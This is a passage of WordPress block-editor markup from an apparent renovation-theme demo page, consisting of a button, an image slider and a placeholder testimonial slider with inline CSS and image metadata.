vulputate.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"left\"} -->\n<div class=\"left tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"VIEW ALL WORKS\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/recent-works/\",\"counterId\":\"7fdef199-26ec-46ac-b2e9-e54d01000475\",\"vPadding\":17,\"hPadding\":35,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"#0d2e63\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#ffffff\",\"buttonFontWeight\":\"700\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px !important; margin-bottom: 10px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 17px; padding-bottom: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 35px; padding-right: 35px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: #0d2e63; }\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 700; line-height: undefined; opacity: 1; }\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #ffffff; }\n</style><style type=\"text/css\"> .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n@media only screen and (max-width: 976px){\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n@media only screen and (max-width: 767px){\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://sktperfectdemo.com/themepack/gbrenovate/recent-works/\">VIEW ALL WORKS</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":66,\"leftPadding\":120,\"leftPaddingTablet\":50,\"topPaddingMobile\":40,\"leftPaddingMobile\":0,\"blockId\":\"5e6e58f8-acdc-4281-9713-b2c98a4e716d\"} -->\n<style type=\"text/css\"> .block-5e6e58f8-acdc-4281-9713-b2c98a4e716d .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-5e6e58f8-acdc-4281-9713-b2c98a4e716d .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-5e6e58f8-acdc-4281-9713-b2c98a4e716d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 120px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-5e6e58f8-acdc-4281-9713-b2c98a4e716d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 50px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-5e6e58f8-acdc-4281-9713-b2c98a4e716d .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-5e6e58f8-acdc-4281-9713-b2c98a4e716d\" style=\"width:66%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":450,\"autoPlay\":true,\"autoPlaySpeed\":\"2000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#ffffff\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"ca90f3dd-ac39-45a1-b448-4f4d323edecb\"} -->\n<style type=\"text/css\"> .block-id-ca90f3dd-ac39-45a1-b448-4f4d323edecb .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-ca90f3dd-ac39-45a1-b448-4f4d323edecb .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-ca90f3dd-ac39-45a1-b448-4f4d323edecb .skt-blocks-gallery--item figure {\n height: 430px; }\n</style><div class=\"\"><div class=\"block-id-ca90f3dd-ac39-45a1-b448-4f4d323edecb is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:450px\" data-flickity=\"{&quot;autoPlay&quot;:2000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider3-1024x597.jpg\" alt=\"\" data-id=\"35\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider3/\" class=\"wp-image-35\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider2/\" class=\"wp-image-34\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"424cb1af-2a1b-4163-a4f3-8d11acf339b8\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"backgroundImage\":\"https://cteisys.com/wp-content/uploads/2021/05/testimonial-bg-img.jpg\",\"backgroundPosition\":\"center center\",\"backgroundType\":\"image\",\"className\":\"gb-renovation-section-4\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-4 skt-blocks-block-section-outer-wrap block-424cb1af-2a1b-4163-a4f3-8d11acf339b8 background-type-image alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(https://cteisys.com/wp-content/uploads/2021/05/testimonial-bg-img.jpg); background-position: center center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><style type=\"text/css\"> .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-424cb1af-2a1b-4163-a4f3-8d11acf339b8.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"2caf698d-f57b-4edb-a3c6-802f06514e20\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":32,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-desc-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2caf698d-f57b-4edb-a3c6-802f06514e20 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-2caf698d-f57b-4edb-a3c6-802f06514e20\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Testimonials</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Read Our Clients<br>Latest Reviews</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:skt-blocks/testimonial-slider {\"classMigrate\":true,\"test_block\":[{\"description\":\"Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.\",\"name\":\"John Doe \",\"company\":\"Happy Customer\",\"image\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8f05029117\",\"delete\":\"a8ff1c4035\",\"edit\":\"ee60ba071d\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"description\":\"Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.\",\"name\":\"John Doe \",\"company\":\"Happy Customer\",\"image\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8c7518bbdc\",\"delete\":\"de8f66528c\",\"edit\":\"99bb75a0ef\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"description\":\"Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.\",\"name\":\"John Doe \",\"company\":\"Happy Customer\",\"image\":{\"id\":16,\"title\":\"blog-img\",\"filename\":\"blog-img.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/blog-img.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/blog-img/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"blog-img\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:32.000Z\",\"modified\":\"2021-05-25T13:48:32.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"25f63e1ba1\",\"delete\":\"1ea75ab2d2\",\"edit\":\"f534b4e6c3\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=16u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":53731,\"filesizeHumanReadable\":\"52 KB\",\"context\":\"\",\"height\":400,\"width\":560,\"orientation\":\"landscape\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-150x150.jpg\",\"orientation\":\"landscape\"},\"medium\":{\"height\":214,\"width\":300,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-300x214.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/blog-img.jpg\",\"height\":400,\"width\":560,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}}],\"descColor\":\"#494848\",\"companyColor\":\"#303030\",\"authorColor\":\"#303030\",\"imagePosition\":\"left\",\"nameFontSize\":21,\"nameFontFamily\":\"Poppins\",\"nameFontWeight\":\"600\",\"companyFontSize\":16,\"companyFontFamily\":\"Poppins\",\"companyFontWeight\":\"400\",\"descFontSize\":16,\"descFontFamily\":\"Poppins\",\"descFontWeight\":\"400\",\"nameSpace\":10,\"descSpace\":20,\"block_id\":\"9a21f129\",\"imgVrPadding\":5,\"imgHrPadding\":20,\"columns\":2,\"transitionSpeed\":1000,\"autoplaySpeed\":5000,\"arrowDots\":\"dots\",\"rowGap\":20,\"columnGap\":25,\"contentPadding\":30,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\",\"arrowColor\":\"#fe8333\"} -->\n<style type=\"text/css\"> .skt-blocks-slick-carousel.skt-blocks-block-9a21f129 button.slick-arrow {\n border-width: 1px; border-radius: 0px; border-color: #fe8333; }\n .skt-blocks-slick-carousel.skt-blocks-block-9a21f129 ul.slick-dots li button:before, ul.slick-dots li.slick-active button:before {\n color: #fe8333; }\n .skt-blocks-slick-carousel.skt-blocks-block-9a21f129 .slick-arrow svg {\n fill: #fe8333; height: 20px; width: 20px; }\n .skt-blocks-tm__image img{\n width: 60px; max-width: 60px; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-color .skt-blocks-tm__content{\n background-color: #ffffff; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-image .skt-blocks-tm__content{\n background-image: url(null); background-position: center center; background-repeat: no-repeat; background-size: cover; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-image .skt-blocks-tm__overlay{\n background-color: undefined; opacity: 0.5; }\n .skt-blocks-testimonial__wrap {\n padding-left: 12.5px; padding-right: 12.5px; margin-bottom: 20px; }\n .skt-blocks-testimonial__wrap .skt-blocks-tm__image-content {\n padding-left: 20px; padding-right: 20px; padding-top: 5px; padding-bottom: 5px; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-tm__desc {\n padding: 20px; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-testinomial-text-wrap:before {\n border-top: 10px solid center; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-testinomial-text-wrap {\n background-color: center; border-radius: 0px; }\n</style><div class=\"skt-blocks-testomonial__outer-wrap skt-blocks-slick-carousel skt-blocks-tm__arrow-outside skt-blocks-block-9a21f129\"><div class=\"is-carousel skt-blocks-tm__columns-2 skt-blocks-tm__items responsive-testimonial-slick-carousel skt-blocks-block-9a21f129\"><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.</div></div><div class=\"skt-blocks-tm__meta\"><div 